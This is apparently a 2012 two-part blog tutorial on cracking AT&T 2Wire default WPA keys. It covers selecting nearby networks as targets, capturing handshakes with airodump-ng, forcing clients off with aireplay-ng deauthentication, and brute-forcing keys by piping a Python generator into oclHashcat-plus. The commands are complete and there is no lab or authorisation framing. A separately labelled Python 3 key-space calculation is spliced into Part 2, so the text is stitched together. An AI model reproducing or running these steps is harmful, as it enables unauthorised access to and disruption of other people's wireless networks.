Part 2. Cracking AT&T WPA1/2

Monday, September 24, 2012 Posted by Unknown

Part 2. Cracking AT&T WPA1/2 with python script and hashcat.

This assumes you already have the four-way handshake from part 1.

My Python script can be found here. It creates a CPU pool sized to the number of cores you have. It is written for Python 2.7.3 on Linux.

The script counts from 000000000 to 9999999999, skipping any number that has the same digit three times in a row, so you won't get keys like 1234555678 (it repeats 5 three times). This is because AT&T decided to make their numbers look "too random", which cuts their key space down. It is faster to count through and skip past the repeating numbers than to process each number.
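To quantify how much the no-three-in-a-row rule actually shrinks the key space, here is an added Python 3 example (not the post's script); it assumes a 10-digit key and uses the 86K and 114K keys/s figures from this post only as inputs.

```python
import itertools
import math

KEY_LENGTH = 10          # assumption: a 2Wire default key is 10 decimal digits
DIGITS = "0123456789"


def has_triple_run(key):
    """True if any digit appears three or more times in a row (the rule the script skips)."""
    return any(key[i] == key[i + 1] == key[i + 2] for i in range(len(key) - 2))


def count_keys_without_triple_run(n):
    """Count length-n digit strings with no three identical digits in a row.

    Dynamic programme over the length of the run that ends the string:
    run1 = strings ending in a run of exactly 1, run2 = strings ending in a run of exactly 2.
    """
    run1, run2 = 10, 0          # one digit: ten strings, each a run of length 1
    for _ in range(n - 1):
        # appending a different digit (9 choices) starts a new run of length 1;
        # appending the same digit is only allowed when the current run is 1
        run1, run2 = 9 * (run1 + run2), run1
    return run1 + run2


def entropy_bits(count):
    return math.log2(count)


def seconds_to_exhaust(count, keys_per_second):
    return count / keys_per_second


def brute_force_count(n):
    """Cross-check the recurrence by enumerating every length-n string (small n only)."""
    return sum(1 for t in itertools.product(DIGITS, repeat=n)
               if not has_triple_run("".join(t)))


if __name__ == "__main__":
    full = 10 ** KEY_LENGTH
    reduced = count_keys_without_triple_run(KEY_LENGTH)
    print("keys in full space:      %d (%.2f bits)" % (full, entropy_bits(full)))
    print("keys with no triple run: %d (%.2f bits)" % (reduced, entropy_bits(reduced)))
    # rates quoted in the post: 86K keys/s through the script, 114K keys/s built-in brute force
    print("hours at 86K keys/s (reduced space): %.1f" % (seconds_to_exhaust(reduced, 86000) / 3600))
    print("hours at 114K keys/s (full space):   %.1f" % (seconds_to_exhaust(full, 114000) / 3600))
```

The rule removes only about 7% of the keys (roughly 0.1 bits), which is why the throughput of the generator, not the size of the skipped space, dominates the total time.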

To change where the program starts, open it and change the following line to whatever you want:

start = str(7)

To run the program, pipe its output into hashcat-plus:

python 2wireWPAiter.py | ./oclHashcat-plus64.bin -m 2500 -a 0 --gpu-accel=160 --gpu-loops=1024 ../dir/2WIREHandShake.hccap


With AMD driver 12.8 and SDK 2.7 I get about 86K keys per second. With the built-in brute force I get 114K keys per second. Still working on how to improve my output speed.

For more info on hashcat, look here.

Starting at 7 on a known key that began with 7 saved over an hour compared with straight brute force.

Screenshots: with script / without script.


Someone in the hashcat room just told me a better way of doing this to make it even faster and more accurate: using http://hashcat.net/wiki/doku.php?id=statsprocessor to make a hcstat file, utilizing Markov chains. I will do this later tonight and post my results.

Edit: you can't use Markov chains with hashcat for this. 

PART 1: Cracking AT&T WPA1/2

Posted by Unknown
Part 1. Getting the handshake.

Aircrack's site has a pretty good tutorial.

Boot from BackTrack 5 R3.

First you want to see what wifi networks you have to choose from. Start your wireless interface in monitor mode:

#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 

You should see several APs. Record the BSSID and channel, along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple of targets on the same channel, close airodump and stop airmon:

#airmon-zc stop mon0

Start airmon-zc on the channel of the target:

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel with some additional options:

#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>

The channel number needs to match your target so you can capture the full four-way handshake between the client and the AP. Airodump shows a notice in the top right-hand corner once you have a handshake.

Instead of waiting around for a client to connect, you can deauthenticate a client and wait for it to reconnect automatically:

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0


Where:
  • -0 means deauthentication
  • 5 is the number of deauths to send
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthenticating
  • mon0 is the interface name

If you are using BackTrack you can easily check your .pcap file for a proper handshake using pyrit, or you can load it in Wireshark and filter for EAPOL, which I will show in a future post.

#pyrit -r FILENAME.pcap analyze 

The output tells you whether you have a good EAPOL handshake, a workable one, or nothing at all if none are found.

To strip everything out of your pcap file except the handshakes, run the following:

#pyrit -r FILENAME.pcap -o OUTPUT.pcap strip

To turn your pcap file into a hashcat-plus friendly file, upload it to https://hashcat.net/cap2hccap/ or follow the steps they give to convert it yourself. I just use their site.

